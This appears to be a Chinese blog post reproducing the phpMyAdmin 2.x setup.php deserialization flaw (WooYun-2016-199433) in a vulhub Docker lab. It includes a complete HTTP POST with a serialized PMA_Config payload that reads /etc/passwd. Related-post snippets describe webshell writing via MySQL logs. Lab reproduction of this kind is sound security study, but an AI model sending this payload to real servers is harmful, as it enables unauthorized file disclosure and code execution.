WooYun-2016-199433 phpmyadmin反序列化漏洞复现

最新推荐文章于 2024-08-03 17:29:20 发布
最新推荐文章于 2024-08-03 17:29:20 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: phpmyadmin php 渗透测试 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/113066088
版权

目录

漏洞描述

  phpmyadmin 2.x 版本中存在反序列化漏洞,当服务器执行了黑客精心构造的payload时,会造成类中的变量被修改,可以任意读取文件或任意执行代码。

影响版本

phpMyAdmin 2.x版本

漏洞环境搭建

使用vulhub直接docker一键启动环境WooYun-2016-199433环境

docker快速入门以及漏洞环境搭建

下载安装好vulhub后进入/vulhub/phpmyadmin/WooYun-2016-199433目录,执行以下命令启动环境

sudo docker-compose up -d

安装成功后查看端口,发现端口被映射在我们8080端口上
在这里插入图片描述
访问虚拟机中localhost:8080,出现以下界面,表示安装成功
在这里插入图片描述

漏洞分析

漏洞分析文章

漏洞利用

读取/etc/passwd文件

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

在这里插入图片描述
这个漏洞是不能读取php文件,因为有了eval(),相当于任意文件包含了。

getshell需要包含上传的木马文件,也可以包含日志文件。但docker环境中并未开启日志功能,也没有上传点。所以就不进行getshell演示了,感兴趣的话可以看以下这篇文章。

PhpMyAdmin某版本无需登录任意文件包含导致代码执行(可getshell)漏洞分析

漏洞加固

更新PHPmyadmin

凝聚力安全团队
关注
专栏目录
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 384
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
Phpmyadmin 2.X 反序列化漏洞WooYun-2016-199433
jammny
11-28 1257
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 466
Phpmyadmin Scripts / setup.php反序列化漏洞WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
PhPMyadmin-漏洞复现
最新发布
Jz031212的博客
08-03 224
2.因为extensions同级目录下有www文件存放网站,所以我们猜测网站路径在D:\phpstudy_pro\WWW,使用into outfile将一句话木马写入别的目录下。4.在输入 set global general_log_file = '你要将日志保存的路径' 将日志文件路径设置好,点击执行。5.我们在sql框内输入select 123123 后执行,在刚刚的路径内找到我们的日志文件,可以找到我们刚才输入的指令。4.使用中国蚁剑将网址和木马内的密码输入,测试连接,成功即代表注入成功。
phpmyadmin反序列化漏洞WooYun-2016-199433
笑花大王
03-27 869
简介 环境复现:https://github.com/vulhub/vulhub 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具 影响版本 1 1 代码审计 1 利用过程 http://192.168.52.129:8080/scripts/setup.php 发送如下数据包,即可读取/etc/pass...
漏洞复现-Phpmyadmin setup.php反序列化漏洞WooYun-2016-199433
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3911
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
利用Vulnhub复现漏洞 - Elasticsearch写入webshell漏洞WooYun-2015-110216)
JiangBuLiu的博客
07-03 1847
Elasticsearch写入webshell漏洞WooYun-2015-110216)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现创建一个恶意索引文档创建一个恶意的存储库存储库验证并创建检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/WooYun-2015-110216/ 漏洞原理 ElasticS...
py爬虫wooyun-public-master
04-20
### py爬虫wooyun-public-master #### 知识点一:Py爬虫与Wooyun_public-master的关系 - **Py爬虫**:通常指的是使用Python语言编写的网络爬虫程序。这类程序能够自动地抓取互联网上的数据,并进行处理和分析。 - ...
python爬虫案例wooyun-public-master.zip
05-31
在"python爬虫案例wooyun-public-master.zip"中,我们可以深入探讨Python爬虫技术的相关知识点,包括基础概念、常用库、网络请求、HTML解析、数据存储等方面。 1. **基础概念** - **爬虫**: 一种自动浏览并提取...
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 590
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
wooyun.7z乌云数据库
10-22
wooyun.7z乌云数据库
wooyun_search:从wooyun.org搜索
02-06
wooyun_search 乌云公开漏洞,情报搜索 0x00。介绍 灵感起点hanc00l的github项目 wooyun_public基于flask或者tornado,而本项目可以布置在apache,nginx等web服务器上。 如果你有wooyun的静态网页数据,那么我们可以开始了! 整个项目包括两个部分,第一部分是索引,将网页信息存储进数据库;第二部分是搜索,从数据库中查找信息。轻量级,支持进行二次开发。 静态网页网盘链接: bugs 链接: https://pan.baidu.com/s/1n_kkUaZZxcTEa4-v6sGa9Q 密码: sg98 (20180707) d
wyquery:Wooyun查询系统
03-11
wyquery Wooyun公开的突破详情是一个很好的资源,但是没有提供很好的搜索引擎和排序功能来进行数据分析,所以,这个项目用户关联wooyun上已经对外公开的入侵详情,并提供更多搜索和排序的功能。 你有没有想完成如下功能? 我想只看给钱的突破 我想只看带乌云标志的突破 我想按照等级排序战术 如果有,那你跟我遇到的问题一样,不妨试试这个项目线上已经搭建好的DEMO环境如下: 营造环境 建议在Linux下运行,当然Windows下也可以。Ruby2.0+ git clone https://github.com/LubyRuffy/wyquery.git cd wyquery bundle install rake db:migrate rails s 然后访问 初次抓取数据 cd wyquery ruby ./tools/import_bugs.rb 同步数据 这时可以建立定时任务
WooyunDrops, Wooyun知识库,乌云知识库,https.zip
09-17
WooyunDrops, Wooyun知识库,乌云知识库,https Wooyun丢弃演示:https://wooyun.kieran.top静态版乌云丢弃选项:2.图片依赖于 https://github.com/SuperKieran/wooyun-img
wooyun drops乌云知识库全部文章.zip
09-13
自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,我只是资料的搬运工,内容质量不负责
WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell
qq_29060627的博客
06-09 370
靶场环境存在 /usr/local/lib/php/pearcmd.php,并且开启了register_argc_argv选项。包含一下/tmp/99;
[Vulhub](WooYun-2016-199433phpmyadmin反序列化漏洞
qq_50854662的博客
10-30 335
0x00 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 345
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值